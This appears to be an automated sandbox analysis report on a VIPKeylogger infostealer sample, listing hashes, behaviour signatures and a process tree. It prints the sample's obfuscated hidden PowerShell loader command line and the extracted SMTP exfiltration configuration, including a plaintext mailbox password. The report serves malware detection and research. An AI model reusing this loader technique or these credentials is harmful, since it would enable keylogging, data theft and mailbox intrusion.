Analysis
-
max time kernel
144s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30/10/2024, 13:10
Static task
static1
Behavioral task
behavioral1
Sample
Fernissagerne.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Fernissagerne.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kmpehjenes.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Kmpehjenes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Fernissagerne.exe
-
Size
778KB
-
MD5
a992bbd745fa0540c9b12c43f871be00
-
SHA1
0435dd15bfd760449e06c1dd2413a4963539ff27
-
SHA256
df90131c240ef4e9b9079e271d16bb1fa5d797ba57a227eb1883814f35358005
-
SHA512
fdbd173fcaec5728117e5a5de3382b5da110f61799571f60cbf755047b77c9024a638ad558a47316b300a0b7f2053baa05d321f76b09459ce05932d985299737
-
SSDEEP
24576:zr5Ob+mp4ZW3/EYSdCVNF45yRQLvf81BV2m6ionDuf:SGW3GC/e5yiX8HuD+
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.inmogomar.com - Port:
587 - Username:
[email protected] - Password:
Gomar-19600 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4948 powershell.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 38 4220 msiexec.exe 40 4220 msiexec.exe 42 4220 msiexec.exe 45 4220 msiexec.exe 47 4220 msiexec.exe 50 4220 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 37 drive.google.com 38 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\folkepensionsaldres\frostbiter.ini Fernissagerne.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4220 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4948 powershell.exe 4220 msiexec.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Levitters.lnk Fernissagerne.exe File opened for modification C:\Windows\Levitters.lnk Fernissagerne.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4276 4220 WerFault.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fernissagerne.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4220 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4948 powershell.exe Token: SeIncreaseQuotaPrivilege 4948 powershell.exe Token: SeSecurityPrivilege 4948 powershell.exe Token: SeTakeOwnershipPrivilege 4948 powershell.exe Token: SeLoadDriverPrivilege 4948 powershell.exe Token: SeSystemProfilePrivilege 4948 powershell.exe Token: SeSystemtimePrivilege 4948 powershell.exe Token: SeProfSingleProcessPrivilege 4948 powershell.exe Token: SeIncBasePriorityPrivilege 4948 powershell.exe Token: SeCreatePagefilePrivilege 4948 powershell.exe Token: SeBackupPrivilege 4948 powershell.exe Token: SeRestorePrivilege 4948 powershell.exe Token: SeShutdownPrivilege 4948 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeSystemEnvironmentPrivilege 4948 powershell.exe Token: SeRemoteShutdownPrivilege 4948 powershell.exe Token: SeUndockPrivilege 4948 powershell.exe Token: SeManageVolumePrivilege 4948 powershell.exe Token: 33 4948 powershell.exe Token: 34 4948 powershell.exe Token: 35 4948 powershell.exe Token: 36 4948 powershell.exe Token: SeDebugPrivilege 4220 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3252 wrote to memory of 4948 3252 Fernissagerne.exe 85 PID 3252 wrote to memory of 4948 3252 Fernissagerne.exe 85 PID 3252 wrote to memory of 4948 3252 Fernissagerne.exe 85 PID 4948 wrote to memory of 4220 4948 powershell.exe 100 PID 4948 wrote to memory of 4220 4948 powershell.exe 100 PID 4948 wrote to memory of 4220 4948 powershell.exe 100 PID 4948 wrote to memory of 4220 4948 powershell.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fernissagerne.exe"C:\Users\Admin\AppData\Local\Temp\Fernissagerne.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Spydspids=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\Stragglier\Kmpehjenes.unt';$Gargle=$Spydspids.SubString(43550,3);.$Gargle($Spydspids)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 23804⤵
- Program crash
PID:4276
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4220 -ip 42201⤵PID:772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD543597781601bc20d50b9471e00d7dd55
SHA1e2f85d659088f7a8dbac0a01cb6b369ea081bb0b
SHA2564c010add8f075a98219cfdaea2b8b7cbd6a1d2f596045561916e2c1da7c67631
SHA512be044aaaa9f586318809942495b269ae8dbabd4aeaf4c2c5b70ed51787141bc8cd0ccf4a4fed2921ed3108e1e6edbfdc61b704252631aa2504926bbcd64361ee
-
Filesize
329KB
MD565dfbe3191b2a3fc36608f8e5a8d9c81
SHA19b699082ed301b1c00b5e90d933cc398dfb95fe4
SHA25641269b9e56ee1550922b662734c60837dd0c94b6cff29f50916b6708b1a33803
SHA5129d334be31248d34264624e2ab4014a68561eff5ab886c9209e37d97b5e8ed1d5d9cace6722a4fe0766455e432017c6a6285583f801d033bdef900cef241bdc64
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82